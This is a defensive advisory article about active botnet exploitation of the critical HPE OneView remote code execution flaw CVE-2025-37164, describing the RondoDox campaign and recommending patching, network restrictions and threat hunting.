Table of Contents
What should admins do now about HPE OneView CVE-2025-37164 botnet attacks on unpatched servers?
HPE OneView CVE-2025-37164: active exploitation of a critical RCE flaw
HPE OneView is an infrastructure management platform that centralizes control of compute, storage, and networking. Many enterprises run it in data centers because it reduces manual effort and speeds up provisioning. That same central role also makes it a high-value target when a critical bug appears.
CVE-2025-37164 is a remote code execution weakness in HPE OneView that was reported in December 2025 and rated critical with a 10.0 CVSS base score. The issue is straightforward: an exposed endpoint accepts attacker-supplied input without proper authentication or authorization checks. The service then passes that input to the underlying operating system runtime for execution without adequate validation. That combination can give an unauthenticated attacker a direct path to run commands on the affected system.
HPE addressed the issue in its advisory (HPESBGN04985 rev.3). The advisory indicates that HPE OneView versions up to v10.20 are affected and that a software update is available to remediate the flaw. In practical terms, any exposed or reachable OneView instance that remains unpatched should be treated as a likely target, not a hypothetical one.
What the exploitation looks like in the wild
Check Point Research reports an active, coordinated campaign exploiting CVE-2025-37164 based on telemetry observations. The campaign moved from early probing to automated, high-volume attempts consistent with botnet activity.
On January 7, 2026, Check Point observed a sharp spike: more than 40,000 exploitation attempts over a short window (approximately 05:45 to 09:20 UTC). The traffic showed automation signals, including repeated patterns and identifiers such as a distinct user-agent string. Observed follow-on commands included attempts to download additional payloads, which helped Check Point attribute the activity to the RondoDox botnet.
RondoDox is described as a Linux-based botnet associated with DDoS activity and cryptocurrency mining. Reporting indicates it targets internet-facing IoT devices and web servers and opportunistically abuses known vulnerabilities—especially on edge or perimeter systems that admins often patch last. Check Point also notes overlap with exploitation of other recently disclosed issues (including React2Shell CVE-2025-55182), which fits a common botnet playbook: scan broadly, exploit fast, and monetize at scale.
A large share of the observed exploitation attempts was attributed to a single IP address in the Netherlands that was already flagged as suspicious elsewhere. That detail should not narrow defensive scope; botnet infrastructure rotates quickly, and the key risk factor remains patch status and exposure.
What to do now (priority actions)
- Patch HPE OneView immediately using the fixed release referenced in HPE advisory HPESBGN04985 rev.3
- Assume exposure equals risk: if OneView is reachable from untrusted networks, treat it as an urgent remediation item
- Hunt for post-exploitation: review OneView host logs, process execution history, and outbound connections for suspicious downloads or unusual command execution
- Add network controls: restrict access to OneView management interfaces to admin networks/VPN only, and block unnecessary outbound traffic from the appliance/host where feasible
- Monitor for exploit signals: alert on unusual user-agent strings, spikes in requests to OneView endpoints, and any command-like input patterns that indicate injection attempts